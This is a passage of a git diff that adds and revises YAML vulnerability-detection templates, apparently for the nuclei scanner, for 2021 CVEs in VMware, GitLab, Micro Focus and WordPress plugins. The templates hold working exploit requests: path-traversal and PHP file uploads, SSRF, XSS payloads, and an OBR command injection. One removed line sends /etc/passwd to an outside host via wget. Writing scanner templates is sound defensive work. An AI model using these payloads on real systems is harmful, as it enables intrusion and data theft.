- https://twitter.com/osama_hroot/status/1367258907601698816
- https://nvd.nist.gov/vuln/detail/CVE-2021-21978
@@ -19,17 +17,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-21978
- cwe-id: CWE-20
- epss-score: 0.97375
- epss-percentile: 0.99888
- cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:*
- metadata:
- max-request: 1
- vendor: vmware
- product: view_planner
- tags: cve,cve2021,vmware,rce,packetstorm,fileupload,intrusive
+ cwe-id: CWE-434
+ tags: cve,cve2021,vmware,rce
-http:
+requests:
- raw:
- |
POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1
@@ -49,16 +40,15 @@ http:
matchers-condition: and
matchers:
- - type: dsl
- dsl:
- - "len(body) == 28"
-
+ - type: status
+ status:
+ - 200
- type: word
- part: body
words:
- "File uploaded successfully."
+ part: body
+ - type: dsl
+ dsl:
+ - "len(body) == 28" # length of "\nFile uploaded successfully."
- - type: status
- status:
- - 200
-# digest: 4b0a00483046022100b62b6618a404c6da47792ebf7c2fbd654ba081e2b4e878cf367f04d3f9fda9dd022100e7625813a7894a33f4dfeadcb91e410330c1d40df1fb958359e283bb876efc62:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# Enhanced by mp on 2022/05/05
diff --git a/poc/cve/cve-2021-22005.yaml b/poc/cve/cve-2021-22005.yaml
new file mode 100644
index 0000000000..12606d2108
--- /dev/null
+++ b/poc/cve/cve-2021-22005.yaml
@@ -0,0 +1,43 @@
+id: CVE-2021-22005
+
+info:
+ name: VMware vCenter Server - Arbitrary File Upload
+ author: PR3R00T
+ severity: critical
+ description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.
+ reference:
+ - https://kb.vmware.com/s/article/85717
+ - https://www.vmware.com/security/advisories/VMSA-2021-0020.html
+ - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-22005
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-22005
+ cwe-id: CWE-434
+ tags: cve,cve2021,vmware,vcenter,upload
+
+requests:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ test_data
+
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 200"
+ - "status_code_2 == 201"
+ - "contains(body_1, 'VMware vSphere')"
+ - "content_length_2 == 0"
+ condition: and
+
+# Enhanced by mp on 2022/05/05
diff --git a/poc/cve/cve-2021-22054.yaml b/poc/cve/cve-2021-22054.yaml
new file mode 100644
index 0000000000..e96b40f597
--- /dev/null
+++ b/poc/cve/cve-2021-22054.yaml
@@ -0,0 +1,47 @@
+id: CVE-2021-22054
+
+info:
+ name: VMWare Workspace ONE UEM - Server-Side Request Forgery
+ author: h1ei1
+ severity: high
+ description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
+ impact: |
+ An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.
+ remediation: |
+ Apply the necessary patches or updates provided by VMWare to fix the vulnerability.
+ reference:
+ - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/
+ - https://www.vmware.com/security/advisories/VMSA-2021-0029.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-22054
+ - https://github.com/fardeen-ahmed/Bug-bounty-Writeups
+ - https://github.com/nomi-sec/PoC-in-GitHub
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-22054
+ cwe-id: CWE-918
+ epss-score: 0.74813
+ epss-percentile: 0.98065
+ cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: vmware
+ product: workspace_one_uem_console
+ fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx"
+ tags: cve2021,cve,vmware,workspace,ssrf
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Interactsh Server"
+
+ - type: status
+ status:
+ - 200
+# digest: 4a0a004730450221008cded273bebf41eff90732aed8ea7da8aa14ca8124eaa2032d424ca27e56d6e7022079f5f692df095ec9105de7a2f9449144593cfd651fe28038d367431e92871cc8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2021-22214.yaml b/poc/cve/cve-2021-22214.yaml
index 0b010e66ba..72ec444e21 100644
--- a/poc/cve/cve-2021-22214.yaml
+++ b/poc/cve/cve-2021-22214.yaml
@@ -1,8 +1,8 @@
id: CVE-2021-22214
info:
- author: Suman_Kar,GitLab Red Team
name: Unauthenticated Gitlab SSRF - CI Lint API
+ author: Suman_Kar,GitLab Red Team
severity: high
description: |
When requests to the internal network for webhooks are enabled,
@@ -20,14 +20,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22175
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- https://docs.gitlab.com/ee/api/lint.html
- metadata:
- shodan-query: http.title:"GitLab"
- tags: cve,cve2021,gitlab,ssrf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
- cvss-score: 8.60
+ cvss-score: 8.6
cve-id: CVE-2021-22214,CVE-2021-39935,CVE-2021-22175
cwe-id: CWE-918
+ metadata:
+ shodan-query: http.title:"GitLab"
+ tags: cve,cve2021,gitlab,ssrf
requests:
- method: POST
diff --git a/poc/cve/cve-2021-22502.yaml b/poc/cve/cve-2021-22502.yaml
index a321359dd9..cb68b9daba 100644
--- a/poc/cve/cve-2021-22502.yaml
+++ b/poc/cve/cve-2021-22502.yaml
@@ -1,42 +1,63 @@
id: CVE-2021-22502
info:
- name: Micro Focus Operation Bridge Reporter (OBR) RCE
+ name: Micro Focus Operations Bridge Reporter - Remote Code Execution
author: pikpikcu
severity: critical
- reference: |
- https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22502
- tags: cve,cve2021,obr,rce
+ description: |
+ Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
+ remediation: |
+ Apply the latest security patches or updates provided by Micro Focus to mitigate this vulnerability.
+ reference:
+ - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md
+ - https://softwaresupport.softwaregrp.com/doc/KM03775947
+ - https://www.zerodayinitiative.com/advisories/ZDI-21-153/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-22502
+ - https://www.zerodayinitiative.com/advisories/ZDI-21-154/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-22502
+ cwe-id: CWE-78
+ epss-score: 0.95993
+ epss-percentile: 0.99434
+ cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: microfocus
+ product: operation_bridge_reporter
+ tags: cve2021,cve,microfocus,obr,rce,kev
-requests:
+http:
- raw:
- |
POST /AdminService/urest/v1/LogonResource HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
- Content-Length: 69
- {"userName":"administrator","credential":"password"}
- - |
- POST /AdminService/urest/v1/LogonResource HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/json
- Content-Length: 69
- {"userName":"something `wget --post-file /etc/passwd burpcollaborator.net`","credential":"whatever"}
+
+ {"userName":"something `wget {{interactsh-url}}`","credential":"whatever"}
+
matchers-condition: and
matchers:
-
- type: word
+ part: interactsh_protocol
words:
- - "application/json"
- part: header
+ - "http"
+ - "dns"
- type: word
- words:
- - "An error occurred. Please contact your system administrator"
part: body
+ words:
+ - "An error occurred"
+ - "AUTHENTICATION_FAILED"
condition: and
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
- type: status
status:
- 401
+# digest: 4b0a00483046022100ed38ca4d38ee6a8827ce0cb424c58a1c6f7273942f72850e30a51a47a8ced4e80221009e6de8be7a1e2e0bca9cba77fac3f7d24b41648cf318f9678bc391420570f366:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2021-24235.yaml b/poc/cve/cve-2021-24235.yaml
new file mode 100644
index 0000000000..903589f3e3
--- /dev/null
+++ b/poc/cve/cve-2021-24235.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-24235
+
+info:
+ name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24235
+ - https://wpscan.com/vulnerability/eece90aa-582b-4c49-8b7c-14027f9df139
+ - https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24235
+ cwe-id: CWE-79
+ tags: cve,cve2021,wordpress,xss,wp-theme
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "input/Autofocus/%0D*/Onfocus=alert(123);"
+ - "goto-tour-list-js-extra"
+ part: body
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-24236.yaml b/poc/cve/cve-2021-24236.yaml
new file mode 100644
index 0000000000..d670c0c1cb
--- /dev/null
+++ b/poc/cve/cve-2021-24236.yaml
@@ -0,0 +1,95 @@
+id: "CVE-2021-24236"
+
+info:
+ name: WordPress Imagements <=1.2.5 - Arbitrary File Upload
+ author: pussycat0x
+ severity: critical
+ description: |
+ WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.
+ impact: |
+ This vulnerability can lead to remote code execution and compromise the affected WordPress site.
+ remediation: |
+ Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
+ - https://wordpress.org/plugins/imagements/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24236
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: "CVE-2021-24236"
+ cwe-id: CWE-434
+ epss-score: 0.15028
+ epss-percentile: 0.95292
+ cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:*
+ metadata:
+ max-request: 2
+ vendor: imagements_project
+ product: imagements
+ framework: wordpress
+ tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project
+variables:
+ php: "{{to_lower('{{randstr}}')}}.php"
+ post: "1"
+
+http:
+ - raw:
+ - |
+ POST /wp-comments-post.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+
+ ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+ Content-Disposition: form-data; name="comment"
+
+ {{randstr}}
+ ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+ Content-Disposition: form-data; name="author"
+
+ {{randstr}}
+ ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+ Content-Disposition: form-data; name="email"
+
+ {{randstr}}@email.com
+ ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+ Content-Disposition: form-data; name="url"
+
+ ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+ Content-Disposition: form-data; name="checkbox"
+
+
+ yes
+ ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+ Content-Disposition: form-data; name="naam"
+
+ {{randstr}}
+ ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+ Content-Disposition: form-data; name="image"; filename="{{php}}"
+ Content-Type: image/jpeg
+
+
+
+ ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+ Content-Disposition: form-data; name="submit"
+
+ Post Comment
+ ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+ Content-Disposition: form-data; name="comment_post_ID"
+
+ {{post}}
+ ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
+ Content-Disposition: form-data; name="comment_parent"
+
+ 0
+ ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--
+ - |
+ GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: word
+ part: body_2
+ words:
+ - "CVE-2021-24236"
+# digest: 490a00463044022044c39b76c1670bd3821e888a59c2fcc7c2bebcfb2b62512c46e5d5106b91756302202d835016944e0d0c1b7eb6a83ff6a8fd8d13145e32dd2ad9b570e45291d08ea8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2021-24286.yaml b/poc/cve/cve-2021-24286.yaml
new file mode 100644
index 0000000000..88ac97423a
--- /dev/null
+++ b/poc/cve/cve-2021-24286.yaml
@@ -0,0 +1,51 @@
+id: CVE-2021-24286
+
+info:
+ name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.
+ remediation: Fixed in version 1.3.1
+ reference:
+ - https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27
+ - https://www.exploit-db.com/exploits/50350
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24286
+ - https://wordpress.org/plugins/redirect-404-to-parent/
+ - https://github.com/ARPSyndicate/cvemon
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24286
+ cwe-id: CWE-79
+ epss-score: 0.00231
+ epss-percentile: 0.60494
+ cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:*
+ metadata:
+ verified: true
+ max-request: 2
+ vendor: mooveagency
+ product: redirect_404_to_parent
+ framework: wordpress
+ tags: cve2021,cve,xss,wordpress,wpscan,authenticated,exploitdb,wp-plugin,mooveagency
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In
+ - |
+ GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(content_type_2, "text/html")'
+ - 'contains(body_2, "alert%28document.domain%29") && contains(body_2, "Moove redirect 404")'
+ - 'status_code_2 == 200'
+ condition: and
+# digest: 4b0a004830460221009c8a16dca3ea8098cdf84c96ec66655812cb68fb55b9e286f7fe420d60faa9110221009d1a382904cfdd55a6f49320a79ef9b8f3b938ad8bc9db2d8b1fadfd597b6e3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2021-24291.yaml b/poc/cve/cve-2021-24291.yaml
index a0d452ef52..63ca46b69d 100644
--- a/poc/cve/cve-2021-24291.yaml
+++ b/poc/cve/cve-2021-24291.yaml
@@ -3,27 +3,36 @@ id: CVE-2021-24291
info:
name: Photo Gallery < 1.5.69 - Multiple Reflected Cross-Site Scripting (XSS)
author: geeknik
- description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
- reference: https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
severity: medium
- tags: cve,cve2021,10web,xss
+ description: The plugin was vulnerable to Reflected Cross-Site Scripting (XSS) issues via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action (available to both unauthenticated and authenticated users)
+ reference:
+ - https://wpscan.com/vulnerability/cfb982b2-8b6d-4345-b3ab-3d2b130b873a
+ - https://packetstormsecurity.com/files/162227/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24291
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wordpress,wp-plugin,photo
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E"
- - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E"
- - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_id=1%22%20onmouseover=alert(1)%3E"
+ - '{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//'
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
part: header
words:
- "text/html"
+
- type: word
words:
- - "\" onmouseover=alert(1)>"
+ - "onmouseover=alert(document.domain)//"
+ - "wp-content/uploads/photo-gallery"
+ condition: and
diff --git a/poc/cve/cve-2021-24300.yaml b/poc/cve/cve-2021-24300.yaml
index 33ab74ea05..d825b9c184 100644
--- a/poc/cve/cve-2021-24300.yaml
+++ b/poc/cve/cve-2021-24300.yaml
@@ -1,21 +1,35 @@
id: CVE-2021-24300
info:
- name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS
+ name: WordPress WooCommerce <1.13.22 - Cross-Site Scripting
author: cckuailong
severity: medium
- description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue.
+ description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
+ remediation: |
+ Update WordPress WooCommerce plugin to version 1.13.22 or later to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
- https://nvd.nist.gov/vuln/detail/CVE-2021-24300
+ - https://github.com/ARPSyndicate/cvemon
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24300
cwe-id: CWE-79
- tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+ epss-score: 0.00338
+ epss-percentile: 0.70768
+ cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:*
+ metadata:
+ max-request: 2
+ vendor: pickplugins
+ product: product_slider_for_woocommerce
+ framework: wordpress
+ tags: cve2021,cve,xss,wp,wordpress,wp-plugin,authenticated,wpscan,pickplugins
-requests:
+http:
- raw:
- |
POST /wp-login.php HTTP/1.1
@@ -29,7 +43,6 @@ requests:
GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword="onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1
Host: {{Hostname}}
- cookie-reuse: true
matchers-condition: and
matchers:
- type: word
@@ -47,3 +60,4 @@ requests:
- type: status
status:
- 200
+# digest: 4a0a00473045022100c921ac5e1370ee8254b2f60b17eb43e9636eab5381b19d528ddffe26ebbd0e670220460bf20def01d52a5c93aca05c79a748d9244053258932d97f65ccb5323b410a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2021-24340.yaml b/poc/cve/cve-2021-24340.yaml
index 860fac55a3..d23a363deb 100644
--- a/poc/cve/cve-2021-24340.yaml
+++ b/poc/cve/cve-2021-24340.yaml
@@ -9,12 +9,13 @@ info:
- https://www.exploit-db.com/exploits/49894
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
- https://github.com/Udyz/WP-Statistics-BlindSQL
- tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind
+ - https://wpscan.com/vulnerability/d2970cfb-0aa9-4516-9a4b-32971f41a19c
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2021-24340
cwe-id: CWE-89
+ tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind
requests:
- method: GET
diff --git a/poc/cve/cve-2021-24499.yaml b/poc/cve/cve-2021-24499.yaml
new file mode 100644
index 0000000000..ec9b42b879
--- /dev/null
+++ b/poc/cve/cve-2021-24499.yaml
@@ -0,0 +1,54 @@
+id: CVE-2021-24499
+
+info:
+ name: WordPress Workreap - Remote Code Execution
+ author: daffainfo
+ severity: critical
+ description: WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
+ reference:
+ - https://github.com/RyouYoo/CVE-2021-24499
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24499
+ - https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb
+ - https://jetpack.com/2021/07/07/multiple-vulnerabilities-in-workreap-theme/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-24499
+ cwe-id: CWE-434
+ tags: cve,cve2021,wordpress,wp-plugin,rce,intrusive,wp,workreap
+
+requests:
+ - raw:
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9
+ X-Requested-With: XMLHttpRequest
+
+ -----------------------------cd0dc6bdc00b1cf9
+ Content-Disposition: form-data; name="action"
+
+ workreap_award_temp_file_uploader
+ -----------------------------cd0dc6bdc00b1cf9
+ Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php"
+ Content-Type: application/x-httpd-php
+
+
+ -----------------------------cd0dc6bdc00b1cf9--
+
+ - |
+ GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - "71abe5077dae2754c36d731cc1534d4d"
+
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/05/16
diff --git a/poc/cve/cve-2021-24746.yaml b/poc/cve/cve-2021-24746.yaml
index 666d1918ad..3ed4f8b80a 100644
--- a/poc/cve/cve-2021-24746.yaml
+++ b/poc/cve/cve-2021-24746.yaml
@@ -8,14 +8,14 @@ info:
reference:
- https://wpscan.com/vulnerability/99f4fb32-e312-4059-adaf-f4cbaa92d4fa
- https://nvd.nist.gov/vuln/detail/CVE-2021-24746
- metadata:
- google-query: 'inurl:"/wp-content/plugins/sassy-social-share"'
- tags: cve,cve2021,wordpress,wp-plugin,xss,wp
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2021-24746
cwe-id: CWE-79
+ metadata:
+ google-query: inurl:"/wp-content/plugins/sassy-social-share"
+ tags: cve,cve2021,wordpress,wp-plugin,xss,wp
requests:
- method: GET
diff --git a/poc/cve/cve-2021-24762.yaml b/poc/cve/cve-2021-24762.yaml
index b57087c79e..6d5d1735a8 100644
--- a/poc/cve/cve-2021-24762.yaml
+++ b/poc/cve/cve-2021-24762.yaml
@@ -1,14 +1,16 @@
id: CVE-2021-24762
info:
- name: Perfect Survey WordPress plugin before 1.5.2 SQLI
+ name: WordPress Perfect Survey<1.5.2 - SQL Injection
author: cckuailong
severity: critical
- description: The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
+ description: |
+ Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
reference:
- https://www.exploit-db.com/exploits/50766
- https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget
- https://nvd.nist.gov/vuln/detail/CVE-2021-24762
+ - https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@@ -23,15 +25,16 @@ requests:
matchers-condition: and
matchers:
- - type: status
- status:
- - 404
+ - type: dsl
+ dsl:
+ - 'duration>=4'
- type: word
part: header
words:
- "wp-ps-session"
- - type: dsl
- dsl:
- - 'duration>=4'
+ - type: status
+ status:
+ - 404
+# Enhanced by mp on 2022/05/16
diff --git a/poc/cve/cve-2021-24891.yaml b/poc/cve/cve-2021-24891.yaml
new file mode 100644
index 0000000000..d739a52f93
--- /dev/null
+++ b/poc/cve/cve-2021-24891.yaml
@@ -0,0 +1,60 @@
+id: CVE-2021-24891
+
+info:
+ name: WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting
+ author: dhiyaneshDk
+ severity: medium
+ description: |
+ WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
+ remediation: |
+ Update WordPress Elementor Website Builder to version 3.1.4 or later to mitigate this vulnerability.
+ reference:
+ - https://www.jbelamor.com/xss-elementor-lightox.html
+ - https://wpscan.com/vulnerability/fbed0daa-007d-4f91-8d87-4bca7781de2d
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24891
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24891
+ cwe-id: CWE-79
+ epss-score: 0.00116
+ epss-percentile: 0.45185
+ cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:*
+ metadata:
+ max-request: 2
+ vendor: elementor
+ product: website_builder
+ framework: wordpress
+ tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js"
+ - "{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9"
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200
+
